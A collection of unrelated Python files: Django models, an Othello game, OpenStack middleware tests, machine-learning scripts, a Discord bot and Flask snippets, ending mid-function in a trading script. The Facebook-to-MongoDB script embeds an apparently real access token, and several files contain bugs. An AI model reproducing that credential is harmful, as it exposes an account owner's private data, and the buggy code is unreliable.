degree =models.CharField(max_length=200)
description = models.TextField()
def get_absolute_url(self):
return reverse("doctor_detail",kwargs={'pk':self.pk})
def __str__(self):
return self.name
class Patient(models.Model):
name= models.CharField(max_length=200)
age = models.CharField(max_length=200)
gender = models.CharField(max_length=200)
illness= models.CharField(max_length=200)
allergies= models.CharField(max_length=200)
email= models.EmailField(max_length=200)
doctor= models.ForeignKey('basic_app.Doctor', related_name='patients')
def get_absolute_url(self):
return reverse("patient_detail",kwargs={'pk':self.pk})
def __str__(self):
return self.name
|
WHITE, WHITE_STR = 1, "\u25cb"
BLACK, BLACK_STR = -1, "\u25cf"
EMPTY, EMPTY_STR = 0, " "
class Game:
"""
Every state of the game will be an instant of the class.
It contains every relevant information of the game.
"""
def __init__(self):
self.current_player = BLACK
self.board = [[EMPTY, EMPTY, EMPTY, EMPTY, EMPTY, EMPTY, EMPTY, EMPTY],
[EMPTY, EMPTY, EMPTY, EMPTY, EMPTY, EMPTY, EMPTY, EMPTY],
[EMPTY, EMPTY, EMPTY, EMPTY, EMPTY, EMPTY, EMPTY, EMPTY],
[EMPTY, EMPTY, EMPTY, BLACK, WHITE, EMPTY, EMPTY, EMPTY],
[EMPTY, EMPTY, EMPTY, WHITE, BLACK, EMPTY, EMPTY, EMPTY],
[EMPTY, EMPTY, EMPTY, EMPTY, EMPTY, EMPTY, EMPTY, EMPTY],
[EMPTY, EMPTY, EMPTY, EMPTY, EMPTY, EMPTY, EMPTY, EMPTY],
[EMPTY, EMPTY, EMPTY, EMPTY, EMPTY, EMPTY, EMPTY, EMPTY]]
self.__directions = [(1, 1), (1, 0), (1, -1), (0, -1), (-1, -1), (-1, 0), (-1, 1), (0, 1)]
def __str__(self):
"""
Overrides the original print statement in order to print the board when calling 'print(Game())'
"""
string = [" 1 2 3 4 5 6 7 8\n", " +---+---+---+---+---+---+---+---+\n"]
for x in range(8):
string.append("{} ".format(x + 1))
for y in range(8):
string.append("| {} ".format(self.__getString(x, y)))
string.append("|\n")
string.append(" +---+---+---+---+---+---+---+---+\n")
return "".join(string)
def __getString(self, x, y):
"""
Returns the corresponding string representing each player
:param x: Indicates the row of the board
:param y: Indicates the column of the board
"""
if self.board[x][y] == BLACK:
return BLACK_STR
elif self.board[x][y] == WHITE:
return WHITE_STR
else:
return EMPTY_STR
@staticmethod
def __isOnBoard(move):
"""
Returns true if the move is inside the board and false otherwise
:param move: a tuple containing the position of the square the player wishes to place a token
"""
return 0 <= move[0] < 8 and 0 <= move[1] < 8
def __isEmpty(self, move):
"""
Returns true if move is inside the board and false otherwise
:param move: a tuple containing the position of the square the player wishes to place a token
"""
return self.board[move[0]][move[1]] == EMPTY
def __incrementUntilSameColor(self, origin, direction):
"""
This method is to help the method '__flipsTokens()' check if a given move generates a list of
coordinates of squares whose tokens must flip colors. It returns the coordinates of the end
square and true if such list exists and (none, false) otherwise.
:param origin: The starting position of the method
:param direction: A given direction which the method will "move" towards to in order to complete the check.
"""
current_square = origin
current_square = [x + y for x, y in zip(current_square, direction)]
while self.__isOnBoard(current_square) and self.board[current_square[0]][
current_square[1]] == -self.current_player:
current_square = [x + y for x, y in zip(current_square, direction)]
if self.__isOnBoard(current_square) and self.board[current_square[0]][current_square[1]] == self.current_player:
return True, current_square
else:
return False, None
def __flipsTokens(self, move):
"""
Returns a list containing the position of the squares which contain the opponent's token which must change color
:param move: a tuple containing the position of the square the player wishes to place a token
"""
toBeFlipped = list()
for direction in self.__directions:
found, end = self.__incrementUntilSameColor(move, direction)
while found and (not end == move):
end = [x - y for x, y in zip(end, direction)]
if not end == move:
toBeFlipped.append(end)
return toBeFlipped
def isValid(self, move):
"""
Returns true if a move is valid and false otherwise
:param move: a tuple containing the position of the square the player wishes to place a token
"""
return self.__isOnBoard(move) and len(self.__flipsTokens(move)) > 0 and self.__isEmpty(move)
def hasValid(self):
"""
Returns true if the current player has any valid moves and false otherwise
"""
for x in range(8):
for y in range(8):
if self.isValid([x, y]):
return True
return False
def getValid(self):
"""
Returns a list containing every valid move the current player can make
"""
validList = list()
for x in range(8):
for y in range(8):
if self.isValid([x, y]):
validList.append([x, y])
return validList
def makeMove(self, move):
"""
Executes the give move, updates the board and switches current player to it's opponent
"""
if self.isValid(move):
toBeFliped = self.__flipsTokens(move)
self.board[move[0]][move[1]] = self.current_player
for x, y in toBeFliped:
self.board[x][y] = self.current_player
self.current_player = -self.current_player
def isFinished(self):
"""
Returns true if the game is over and false otherwise
"""
for x in range(8):
for y in range(8):
if self.__isEmpty([x, y]):
return False
return True
|
# Copyright 2013 Openstack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
import mock
from wafflehaus.payload_filter import unset_key
from wafflehaus import tests
class TestPayloadFilter(tests.TestCase):
def setUp(self):
self.app = mock.Mock()
simple_widget = 'widget:thing=thingie'
complex_widget = 'widget:sub:thing=thingie'
multi_widget = 'widgets:thing=thingie'
multi_subwidget = 'widgets:sub:thing=thingie'
self.simple_conf1 = {'resource': 'POST /widget', 'enabled': 'true',
'defaults': simple_widget}
self.simple_conf2 = {'resource': 'POST /widget', 'enabled': 'true',
'defaults': complex_widget}
self.multi_conf = {'resource': 'POST /widget', 'enabled': 'true',
'defaults': '%s,%s' % (simple_widget,
complex_widget)}
self.multi_confr = {'resource': 'POST /widget', 'enabled': 'true',
'defaults': '%s,%s' % (complex_widget,
simple_widget)}
self.plural_conf = {'resource': 'POST /widget', 'enabled': 'true',
'defaults': multi_widget}
self.plural_conf2 = {'resource': 'POST /widget', 'enabled': 'true',
'defaults': multi_subwidget}
self.body1 = '{"widget": { "name": "foo"}}'
self.body2 = '{"widget": { "name": "foo", "thing": "derp"}}'
self.body3 = '{"widget": { "name": "foo", "sub": { "name": "bar"}}}'
self.body4 = '{"widgets": [{"name": "1"},{"name": "2"}]}'
self.body5 = '{"widgets": [{"sub":{"name": "1"}}]}'
def test_default_instance_create_simple(self):
result = unset_key.filter_factory(self.simple_conf1)(self.app)
self.assertIsNotNone(result)
self.assertTrue(hasattr(result, 'resources'))
self.assertTrue(isinstance(result.resources, dict))
self.assertEqual(1, len(result.resources))
resources = result.resources
self.assertTrue('/widget' in resources)
self.assertEqual(1, len(resources['/widget']))
def test_request_body_overridden(self):
"""Payload filter will set values for keys that do not exist."""
result = unset_key.filter_factory(self.simple_conf1)(self.app)
resp = result.__call__.request('/widget', method='POST',
body=self.body1)
self.assertEqual(self.app, resp)
body = result.body
self.assertIsNotNone(body)
json_body = json.loads(body)
self.assertTrue('widget' in json_body)
self.assertTrue('thing' not in json_body)
widget = json_body['widget']
self.assertTrue('name' in widget)
self.assertEqual('foo', widget['name'])
self.assertTrue('thing' in widget)
self.assertEqual('thingie', widget['thing'])
def test_request_body_not_overridden(self):
"""Payload filter will not change values that are set."""
result = unset_key.filter_factory(self.simple_conf1)(self.app)
resp = result.__call__.request('/widget', method='POST',
body=self.body2)
self.assertEqual(self.app, resp)
body = result.body
self.assertIsNotNone(body)
json_body = json.loads(body)
self.assertTrue('widget' in json_body)
self.assertTrue('thing' not in json_body)
widget = json_body['widget']
self.assertTrue('name' in widget)
self.assertEqual('foo', widget['name'])
self.assertTrue('thing' in widget)
self.assertEqual('derp', widget['thing'])
def test_request_complex_path(self):
result = unset_key.filter_factory(self.simple_conf2)(self.app)
resp = result.__call__.request('/widget', method='POST',
body=self.body3)
self.assertEqual(self.app, resp)
body = result.body
self.assertIsNotNone(body)
json_body = json.loads(body)
self.assertTrue('widget' in json_body)
self.assertTrue('thing' not in json_body)
widget = json_body['widget']
self.assertTrue('thing' not in widget)
self.assertTrue('name' in widget)
self.assertEqual('foo', widget['name'])
self.assertTrue('sub' in widget)
sub = widget['sub']
self.assertEqual('thingie', sub['thing'])
def test_request_multi_path(self):
result = unset_key.filter_factory(self.multi_conf)(self.app)
resp = result.__call__.request('/widget', method='POST',
body=self.body3)
self.assertEqual(self.app, resp)
body = result.body
self.assertIsNotNone(body)
json_body = json.loads(body)
self.assertTrue('widget' in json_body)
widget = json_body['widget']
self.assertTrue('name' in widget)
self.assertEqual('foo', widget['name'])
self.assertTrue('thing' in widget)
self.assertEqual('thingie', widget['thing'])
self.assertTrue('sub' in widget)
sub = widget['sub']
self.assertEqual('thingie', sub['thing'])
def test_request_multi_path_with_part_missing(self):
result = unset_key.filter_factory(self.multi_conf)(self.app)
resp = result.__call__.request('/widget', method='POST',
body=self.body1)
self.assertEqual(self.app, resp)
body = result.body
self.assertIsNotNone(body)
json_body = json.loads(body)
self.assertTrue('widget' in json_body)
widget = json_body['widget']
self.assertTrue('name' in widget)
self.assertEqual('foo', widget['name'])
self.assertTrue('thing' in widget)
self.assertEqual('thingie', widget['thing'])
self.assertFalse('sub' in widget)
def test_request_multi_path_with_part_missing_reversed(self):
result = unset_key.filter_factory(self.multi_confr)(self.app)
resp = result.__call__.request('/widget', method='POST',
body=self.body1)
self.assertEqual(self.app, resp)
body = result.body
self.assertIsNotNone(body)
json_body = json.loads(body)
self.assertTrue('widget' in json_body)
widget = json_body['widget']
self.assertTrue('name' in widget)
self.assertEqual('foo', widget['name'])
self.assertTrue('thing' in widget)
self.assertEqual('thingie', widget['thing'])
self.assertFalse('sub' in widget)
def test_request_plural_request(self):
result = unset_key.filter_factory(self.plural_conf)(self.app)
resp = result.__call__.request('/widget', method='POST',
body=self.body4)
self.assertEqual(self.app, resp)
body = result.body
self.assertIsNotNone(body)
json_body = json.loads(body)
self.assertTrue('widgets' in json_body)
self.assertTrue('thing' not in json_body)
widgets = json_body['widgets']
for widget in widgets:
self.assertTrue('name' in widget)
self.assertTrue('thing' in widget)
self.assertEqual('thingie', widget['thing'])
def test_request_plural_sub_request(self):
result = unset_key.filter_factory(self.plural_conf2)(self.app)
resp = result.__call__.request('/widget', method='POST',
body=self.body5)
self.assertEqual(self.app, resp)
body = result.body
self.assertIsNotNone(body)
json_body = json.loads(body)
self.assertTrue('widgets' in json_body)
self.assertTrue('thing' not in json_body)
widgets = json_body['widgets']
for widget in widgets:
self.assertTrue('thing' not in widget)
self.assertTrue('sub' in widget)
sub = widget['sub']
self.assertTrue('name' in sub)
self.assertTrue('thing' in sub)
self.assertEqual('thingie', sub['thing'])
def test_override_runtime(self):
self.set_reconfigure()
result = unset_key.filter_factory(self.plural_conf2)(self.app)
headers = {'X_WAFFLEHAUS_DEFAULTPAYLOAD_ENABLED': False}
resp = result.__call__.request('/widget', method='POST',
body=self.body5, headers=headers)
self.assertEqual(self.app, resp)
self.assertFalse(hasattr(result, 'body'))
headers = {'X_WAFFLEHAUS_DEFAULTPAYLOAD_ENABLED': True}
resp = result.__call__.request('/widget', method='POST',
body=self.body5, headers=headers)
self.assertEqual(self.app, resp)
self.assertTrue(hasattr(result, 'body'))
|
from __future__ import absolute_import, unicode_literals, print_function
import mock
from unittest import TestCase
from libraries.lambda_handlers.list_endpoints_handler import ListEndpointsHandler
class TestListEndpointsHandler(TestCase):
@mock.patch('libraries.manager.manager.TxManager.setup_resources')
@mock.patch('libraries.manager.manager.TxManager.list_endpoints')
def test_handle(self, mock_list_endpoints, mock_setup_resources):
mock_list_endpoints.return_value = None
event = {
'data': {},
'body-json': {},
'vars': {
'gogs_url': 'https://git.example.com',
'cdn_url': 'https://cdn.example.com',
'api_url': 'https://api.example.com',
'cdn_bucket': 'cdn_test_bucket',
'job_table_name': 'test-tx-job',
'module_table_name': 'test-tx-module'
}
}
handler = ListEndpointsHandler()
self.assertIsNone(handler.handle(event, None))
|
import pandas
import numpy as np
from sklearn.ensemble import RandomForestRegressor
#read data
data=pandas.read_csv("/home/alex/Desktop/telelis/data/meteo.txt", header=None)
#prepare training test
X_train=data.iloc[:3266,[2,3,4,5,6]]
y_train=data.iloc[:3266,0]
#prepare test set
X_test=data.iloc[-20:,[2,3,4,5,6]]
y_test=data.iloc[-20:,0]
#train rf
regr = RandomForestRegressor(max_depth=500, random_state=42)
regr.fit(X_train, y_train)
#predict
predictions=regr.predict(X_test)
#evaluate
real=y_test
percent_deviations=[]
for i in range(0, 20):
percent_deviation=abs(real.iloc[i]-predictions[i])/real.iloc[i]*100
percent_deviations.append(percent_deviation)
mean_percent_deviation=np.mean(percent_deviations)
squarederror=[p**2 for p in percent_deviations]
mse=np.mean(squarederror)
mean_accuracy=100-mean_percent_deviation
print("\nMean Percent Accuracy for Random Forest: %.3f")%mean_accuracy
print("\nMean Percent Deviation for Random Forest: %.3f")%mean_percent_deviation
print("MSE: %.3f")%mse
# best Acc 95.74, MSE 28.3
|
import urllib3
import requests
import json
import pymongo #importing pymongo library
#Creating mongodb connection
myclient = pymongo.MongoClient("mongodb://127.0.0.1:27017")
#Creating database and collection object
mydb = myclient["posts"]
mycol = mydb["posts_collection"]
#facebook url GET request
url_request_facebook = requests.get("https://graph.facebook.com/v3.1/me?fields=posts.include_hidden(true).show_expired(true)%7Bfull_picture%2Clink%2Ccomments%2Cdescription%2Cwith_tags%2Cplace%2Cattachments%2Clikes%2Cicon%2Cpicture%2Ctype%7D&access_token=EAAd6TdjdprUBAC8Inew2WCZBznKDVDC58cDAZCYkyAZC1sZCdsRexIgxZCuAwT1FkmHNhgzbt8B9NCeYbbksTaXWCDD9lGgLY6ZBM0wLZCZCX5b1VvNOg6iMiESdToHIJIlvTgcJ3krv1SeM9iaQD5A2tPC2KbPYB70G8AO6DhAdBfZBLrbj9P6yy8v1hF0hmcdwhwN3cZA3Yf0gZDZD")
#creating json object
data = url_request_facebook.json()
dictionary_data = data['posts']['data']
#storing dictionary in database
mycol.insert_many(dictionary_data)
|
import os
def new_entry(item, value):
with open("./Max/files/list.csv", "a") as f:
f.write(item + ";" + value + "\n")
def delete_entry(i):
result = []
with open("./Max/files/list.csv", "r") as file:
# Text in Lines speichern
lines = file.readlines()
for v in lines:
v = v.rstrip()
entry = v.split(";")
result.append(entry)
with open("./Max/files/list.csv", "w") as file:
# Zeile aus Array löschen und file überschreiben
del result[i]
for v in result:
file.write(v[0] + ";" + v[1] + "\n")
def change_entry(i, item, value):
result = []
with open("./Max/files/list.csv", "r") as file:
# Text in Lines speichern
lines = file.readlines()
for v in lines:
v = v.rstrip()
entry = v.split(";")
result.append(entry)
with open("./Max/files/list.csv", "w") as file:
# Zeile an Stelle i ändern und file überschreiben
result1[i] = [item, value]
for v in result:
file.write(v[0] + ";" + v[1] + "\n")
def get_entry(i):
result = []
with open("./Max/files/list.csv", "r") as file:
# Text in Lines speichern
lines = file.readlines()
for v in lines:
v = v.rstrip()
entry = v.split(";")
result.append(entry)
return result[i]
def get_all_entries():
result = []
with open("./Max/files/list.csv", "r") as file:
# Text in Array speichern
lines = file.readlines()
for v in lines:
v = v.rstrip()
entry = v.split(";")
result.append(entry)
return result
def open_file():
os.system("open " + "./Max/files/list.csv")
|
"""
A module with utility functions for vector calculus.
All inputs and outputs are expected to be in a numpy array
shaped (n, 3) where n is some positive number.
"""
import numpy as np
def cross_product(x, y):
N = np.stack(
[
x[:, 1] * y[:, 2] - x[:, 2] * y[:, 1],
x[:, 2] * y[:, 0] - x[:, 0] * y[:, 2],
x[:, 0] * y[:, 1] - x[:, 1] * y[:, 0],
],
axis=-1,
)
return N
def intersect(v_origin, v_direction, plane_origin, plane_normal):
vo = v_origin
vd = v_direction
po = plane_origin
pn = plane_normal
np_err = np.geterr()
try:
np.seterr(divide="ignore")
t = np.stack([np.sum(pn * (po - vo), axis=1) / np.sum(pn * vd, axis=1)], 1)
# t[t < 0] = np.nan # TODO: remove?
t[np.isinf(t)] = np.nan
intersection = vo + np.multiply(t, vd)
finally:
np.seterr(**np_err)
return intersection
def squared_norm(x):
return np.sum(x * x, axis=1)
def norm(x):
return np.sqrt(squared_norm(x))
|
import os
from glob import glob
import cv2
import numpy as np
img_paths = glob(os.path.expanduser('~/Downloads/imgs/*.JPG'))
for i, ip in enumerate(img_paths):
rst_img = None
img = cv2.imread(ip)
img = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
img = cv2.resize(img, dsize=(480, 340))
for l, h in [(0,90), (90, 124), (124, 180)]:
im = cv2.inRange(img, (l, 43, 46), (h, 255, 255))
if rst_img is None:
rst_img = im
else:
rst_img = np.hstack([rst_img, im])
cv2.imwrite(os.path.expanduser('~/Downloads/{}.jpg'.format(i)), rst_img)
# raw_input('enter to next') |
import random
import discord
from discord.ext import commands
bot = commands.Bot(command_prefix="$", activity=discord.Activity(name="Teammake | $help", type=1))
class Teammake(commands.Cog):
def __init__(self, bot):
self.bot = bot
async def on_ready(self):
print('Logged on as {0}!'.format(self.user))
async def on_message(self, message):
teampool = message.split(',')
Ateam = []
Bteam = []
if (len(teampool) == 4):
for i in range(2):
random.shuffle(teampool)
Ateam.append(teampool[0])
teampool = teampool[1:]
Bteam.append(teampool[0])
teampool = teampool[1:]
embed = discord.Embed(title = "Teammake complete", description = "Ateam: "+Ateam + '\n' + "Bteam: "+Bteam)
elif (len(teampool) == 6):
for i in range(3):
random.shuffle(teampool)
Ateam.append(teampool[0])
teampool = teampool[1:]
Bteam.append(teampool[0])
teampool = teampool[1:]
embed = discord.Embed(title = "Teammake complete", description = "Ateam: "+Ateam + '\n' + "Bteam: "+Bteam)
elif (len(teampool) == 8):
for i in range(4):
random.shuffle(teampool)
Ateam.append(teampool[0])
teampool = teampool[1:]
Bteam.append(teampool[0])
teampool = teampool[1:]
embed = discord.Embed(title = "Teammake complete", description = "Ateam: "+Ateam + '\n' + "Bteam: "+Bteam)
elif (len(teampool) == 10):
for i in range(5):
random.shuffle(teampool)
Ateam.append(teampool[0])
teampool = teampool[1:]
Bteam.append(teampool[0])
teampool = teampool[1:]
embed = discord.Embed(title = "Teammake complete", description = "Ateam: "+Ateam + '\n' + "Bteam: "+Bteam)
await message.send(embed=embed)
bot.add_cog(Teammake(bot))
bot.run('your token') |
import numpy as np
import gensim
import tensorflow as tf
from os import listdir
import fasttext as ft
POS_tag = ['ADJ', 'ADP', 'ADV', 'AUX', 'CCONJ', 'DET', 'INTJ', 'NOUN', 'NUM', 'PART', 'PRON', 'PROPN', 'PUNCT', 'SCONJ', 'SYM', 'VERB', 'X']
X_POS_tag = ['H', 'RV', 'N', 'Eb', 'Mb', 'Np', 'm', 'v', 'Nu', 'Nc', 'V', 'A', 'a', 'Ap', 'P', 'p', 'L', 'M', 'R', 'E', 'C', 'I', 'T', 'B', 'Y', 'S', 'X', 'Ny', 'NY', 'Vy', 'Ay', 'Nb', 'Vb', 'Ab', '.', ',', 'LBKT', 'RBKT', 'CC', '"', '...', '@', '-', '!', ':', 'Z', '?', 'NP', ';', 'VP', '(', ')', '“', '”', '[', ']', '…', '/', '----------', '*', '---------', '--------', '----------------', '------', '', '+', '#', '$', '&', '^', '=', '_', '`', '~', '’', '<', '>', '..', 'oOo']
DP_tag = ['acl', 'advcl', 'advmod', 'amod', 'appos', 'aux', 'auxpass', 'aux:pass', 'case', 'cc', 'ccomp', 'compound', 'conj', 'cop', 'csubj', 'csubjpass', 'dep', 'det', 'discourse', 'dislocated', 'dobj', 'expl', 'fixed', 'flat', 'foreign', 'goeswith', 'iobj', 'obl', 'list', 'mark', 'neg', 'nmod', 'nsubj', 'nsubjpass', 'nummod', 'obj', 'orphan', 'parataxis', 'punct', 'reparandum', 'root', 'vocative', 'xcomp']
pos_len = len(POS_tag)
dp_len = len(DP_tag)
def load_data(Word2vec, batch_size, f_POS, f_head, f_DP):
max_state = 150
### load data + pos labels
POS_data = []
POS_labels = []
sequence_length = []
row_data = []
row_POS_labels = []
sen_in_batch = 0
for row in f_POS:
list_columns = row[:-1].split('\t')
if not (list_columns[0].isdigit()):
if not (len(row_data) == 0):
sequence_length.append(len(row_data))
while len(row_data) < max_state:
row_data.append(np.zeros(100))
row_POS_labels.append(np.zeros(pos_len))
POS_data.append(row_data)
POS_labels.append(row_POS_labels)
sen_in_batch += 1
if (sen_in_batch == batch_size):
break
row_data = []
row_POS_labels = []
continue
row_data.append(Word2vec[list_columns[1]])
label = np.zeros(len(POS_tag))
label[POS_tag.index(list_columns[3])] = 1
row_POS_labels.append(label)
### load head labels
head_labels = []
row_head_labels = np.zeros((max_state, max_state))
ok = False
cnt = 0
sen_in_batch = 0
for row in f_head:
list_columns = row[:-1].split('\t')
if not (list_columns[0].isdigit()):
if (ok):
head_labels.append(row_head_labels)
ok = False
cnt += 1
sen_in_batch += 1
if (sen_in_batch == batch_size):
break
row_head_labels = np.zeros((max_state, max_state))
continue
ok = True
if (int (list_columns[6]) == 0):
row_head_labels[int (list_columns[0]) - 1, sequence_length[cnt]] = 1
else:
row_head_labels[int (list_columns[0]) - 1, int (list_columns[6]) - 1] = 1
### load DP labels
DP_labels = []
row_DP_labels = np.zeros((max_state, max_state, dp_len))
ok = False
cnt = 0
sen_in_batch = 0
for row in f_DP:
list_columns = row[:-1].split('\t')
if not (list_columns[0].isdigit()):
if (ok):
DP_labels.append(row_DP_labels)
ok = False
cnt += 1
sen_in_batch += 1
if (sen_in_batch == batch_size):
break
row_DP_labels = np.zeros((max_state, max_state, dp_len))
continue
ok = True
if (int (list_columns[6]) == 0):
row_DP_labels[int (list_columns[0]) - 1, sequence_length[cnt], DP_tag.index(list_columns[7])] = 1
else:
row_DP_labels[int (list_columns[0]) - 1, int (list_columns[6]) - 1, DP_tag.index(list_columns[7])] = 1
return POS_data, POS_labels, head_labels, DP_labels, sequence_length
def main():
### load word2vec model
print('load Word2vec model')
Word2vec = ft.load_model('vi.bin')
### make graph
print('make graph')
n_hidden = 100 # also n_cell
max_state = 150
epochs = 100
batch_size = 5
x = tf.placeholder(tf.float64, [None, max_state, 100])
y_POS_ = tf.placeholder(tf.float64, [None, max_state, pos_len])
y_head_ = tf.placeholder(tf.float64, [None, max_state, max_state])
y_DP_ = tf.placeholder(tf.float64, [None, max_state, max_state, dp_len])
sequence_length = tf.placeholder(tf.int64, [None])
w_POS = tf.Variable(tf.truncated_normal([2*n_hidden, pos_len], dtype = tf.float64), name = 'w_POS', dtype = tf.float64)
b_POS = tf.Variable(tf.truncated_normal([1, pos_len], dtype = tf.float64), name = 'b_POS', dtype = tf.float64)
w_head = tf.Variable(tf.truncated_normal([2*n_hidden, 2*n_hidden], dtype = tf.float64), name = 'w_head', dtype = tf.float64)
w_DP = tf.Variable(tf.truncated_normal([4*n_hidden, dp_len], dtype = tf.float64), name = 'w_DP', dtype = tf.float64)
b_DP = tf.Variable(tf.truncated_normal([1, dp_len], dtype = tf.float64), name = 'b_DP', dtype = tf.float64)
### POS layer
fw_lstm_POS = tf.contrib.rnn.LSTMCell(num_units = n_hidden)
bw_lstm_POS = tf.contrib.rnn.LSTMCell(num_units = n_hidden)
with tf.variable_scope('POSlayer'):
(output_fw_POS, output_bw_POS), _ = tf.nn.bidirectional_dynamic_rnn(cell_fw = fw_lstm_POS, cell_bw = bw_lstm_POS, sequence_length = sequence_length, inputs = x, dtype = tf.float64, scope = 'POSlayer')
# output of B-LSTM also concatenation hidden state
h_POS = tf.concat([output_fw_POS, output_bw_POS], axis = -1)
# process output of POS B-LSTM layer
output_POS_relu = tf.reshape(tf.nn.relu(h_POS), [-1, 2*n_hidden])
output_POS_slice = tf.nn.softmax(tf.matmul(output_POS_relu, w_POS) + b_POS)
output_POS = tf.reshape(output_POS_slice, [-1, max_state, pos_len])
# prepare for next layer
y_POS_slice = tf.matmul(output_POS_slice, tf.transpose(w_POS))
y_POS = tf.reshape(y_POS_slice, [-1, max_state, 2*n_hidden])
### dependency parsing layer
x_DP = tf.concat([h_POS, x, y_POS], axis = -1)
fw_lstm_DP = tf.contrib.rnn.LSTMCell(num_units = n_hidden)
bw_lstm_DP = tf.contrib.rnn.LSTMCell(num_units = n_hidden)
with tf.variable_scope('DPlayer'):
(output_fw_DP, output_bw_DP), _ = tf.nn.bidirectional_dynamic_rnn(cell_fw = fw_lstm_DP, cell_bw = bw_lstm_DP, sequence_length = sequence_length, inputs = x_DP, dtype = tf.float64, scope = 'DPlayer')
h_DP = tf.concat([output_fw_DP, output_bw_DP], axis = -1)
h_DP_slice = tf.reshape(h_DP, [-1, 2*n_hidden])
# process output for head marking
w_h = tf.reshape(tf.matmul(h_DP_slice, w_head), [-1, max_state, 2*n_hidden])
h_w_h = tf.matmul(h_DP, tf.transpose(w_h, [0, 2, 1]))
output_head = tf.nn.softmax(h_w_h)
# process output for Dependency Parsing
b1 = tf.reshape(tf.tile(h_DP, [1, 1, max_state]), [-1, max_state*max_state, 2*n_hidden])
b2 = tf.tile(h_DP, [1, max_state, 1])
ht_hj = tf.concat([b1, b2], axis = -1)
output_DP_relu = tf.reshape(tf.nn.relu(ht_hj), [-1, 4*n_hidden])
output_DP_slice = tf.nn.softmax(tf.matmul(output_DP_relu, w_DP) + b_DP)
output_DP = tf.reshape(output_DP_slice, [-1, max_state, max_state, dp_len])
### loss function and optimiers
loss_POS = tf.reduce_mean(tf.reduce_sum(-tf.reduce_sum(y_POS_*tf.log(output_POS), axis = 2), axis = 1))
loss_head = tf.reduce_mean(tf.reduce_sum(-tf.reduce_sum(y_head_*tf.log(output_head), axis = 2), axis = 1))
loss_DP = tf.reduce_mean(tf.reduce_sum(tf.reduce_sum(-tf.reduce_sum(y_DP_*tf.log(output_DP), axis = 3), axis = 2), axis = 1))
optimizer_POS = tf.train.RMSPropOptimizer(0.01).minimize(loss_POS)
optimizer_head = tf.train.RMSPropOptimizer(0.01).minimize(loss_head)
optimizer_DP = tf.train.RMSPropOptimizer(0.001).minimize(loss_DP)
### run models
sess = tf.InteractiveSession()
# tf.global_variables_initializer().run()
saver = tf.train.Saver(max_to_keep = 100)
saver.restore(sess, './models/0.01-0.01-0.001/model7.ckpt')
f_loss = open('./models/0.01-0.01-0.001/loss', 'w')
for epoch in range(8, epochs):
f_POS = open('./data/vi-ud-train.conllu', 'r')
f_head = open('./data/vi-ud-train.conllu', 'r')
f_DP = open('./data/vi-ud-train.conllu', 'r')
start = 0
sum_POS_loss = 0
sum_head_loss = 0
sum_DP_loss = 0
cnt = 0
while (start <= 1400 - 1):
start += batch_size
cnt += 1
print('batch: ', cnt, end = '\r')
batch_data, batch_POS_labels, batch_head_labels, batch_DP_labels, batch_seqlen = load_data(Word2vec, batch_size, f_POS, f_head, f_DP)
sess.run((optimizer_POS, optimizer_head, optimizer_DP), feed_dict = {x: batch_data, y_POS_: batch_POS_labels, y_head_: batch_head_labels, y_DP_: batch_DP_labels, sequence_length: batch_seqlen})
sum_POS_loss += sess.run(loss_POS, feed_dict = {x: batch_data, y_POS_: batch_POS_labels, sequence_length: batch_seqlen})
sum_head_loss += sess.run(loss_head, feed_dict = {x: batch_data, y_POS_: batch_POS_labels, y_head_: batch_head_labels, sequence_length: batch_seqlen})
sum_DP_loss += sess.run(loss_DP, feed_dict = {x: batch_data, y_POS_: batch_POS_labels, y_head_: batch_head_labels, y_DP_: batch_DP_labels, sequence_length: batch_seqlen})
saver.save(sess, './models/cross_entropy/0.01-0.01-0.001/model' + str(epoch) + '.ckpt')
f_loss.write('epoch: ' + str(epoch) + ' loss_POS: ' + str(sum_POS_loss) + ' loss_head: ' + str(sum_head_loss) + ' loss_DP: ' + str(sum_DP_loss))
print('epoch: ', epoch, ' ', 'loss_POS: ', sum_POS_loss, ' loss_head: ', sum_head_loss, ' loss_DP: ', sum_DP_loss)
f_POS.close()
f_head.close()
f_DP.close()
f_loss.close()
if __name__ == '__main__':
main()
|
"""
Create a dictionary with key value pairs to
represent words (key) and its definition (value)
"""
word_definitions = dict()
word_definitions['agitate'] = 'make (someone) troubled or nervous'
word_definitions['onomatopoeia'] = 'the formation of a word from a sound associated with what is named'
"""
Add several more words and their definitions
Example: word_definitions["Awesome"] = "The feeling of students when they are learning Python"
"""
word_definitions['fascism'] = 'a form of far-right, authoritarian ultranationalism characterized by dictatorial power, forcible suppression of opposition, as well as strong regimentation of society and of the economy'
word_definitions['social darwism'] = 'the theory that individuals, groups, and peoples are subject to the same Darwinian laws of natural selection as plants and animals'
"""
Use square bracket lookup to get the definition of two
words and output them to the console with `print()`
"""
print(word_definitions['fascism'])
print(word_definitions['agitate'])
"""
Loop over the dictionary to get the following output:
The definition of [WORD] is [DEFINITION]
The definition of [WORD] is [DEFINITION]
The definition of [WORD] is [DEFINITION]
"""
for key, value in word_definitions.items():
print(f"The definition of {key} is {value}")
|
from flask_sqlalchemy import SQLAlchemy
from flask import current_app
db = SQLAlchemy()
class DatabaseTables(db.Model):
__tablename__ = 'flask_app'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(80), nullable=False)
def __init__(self, id, name):
self.id = id
self.name = name
def __repr__(self):
return 'The id is {}, Name is is {}'.format(self.id, self.name)
|
from flask import Flask
from respberryController import RespberryController
app=Flask(__name__)
@app.route("/")
def hello_world():
return "hello world"
@app.route("/turn/<string:fx>")
def index(fx):
controller.control(fx)
return "turn " + fx
if __name__ == '__main__':
controller = RespberryController()
app.run('0.0.0.0',1234) |
# This is a sample Python script.
# Press Umschalt+F10 to execute it or replace it with your code.
# Press Double Shift to search everywhere for classes, files, tool windows, actions, and settings.
import numpy as np
import pandas as pd
import datetime
import matplotlib as plt
from matplotlib import pyplot as mpl
cumulative_profit = 0.0
tick = 0.00001
ticks_to_target = 75
ticks_to_stop = 1000
volume = 96000
entry_time = '23:10:00'
entry_price = 0.0 # placeholder: to be filled after entry.
exit_time_start_range = '22:50:00'
exit_time_end_range = '22:59:00'
def string_to_time(from_string):
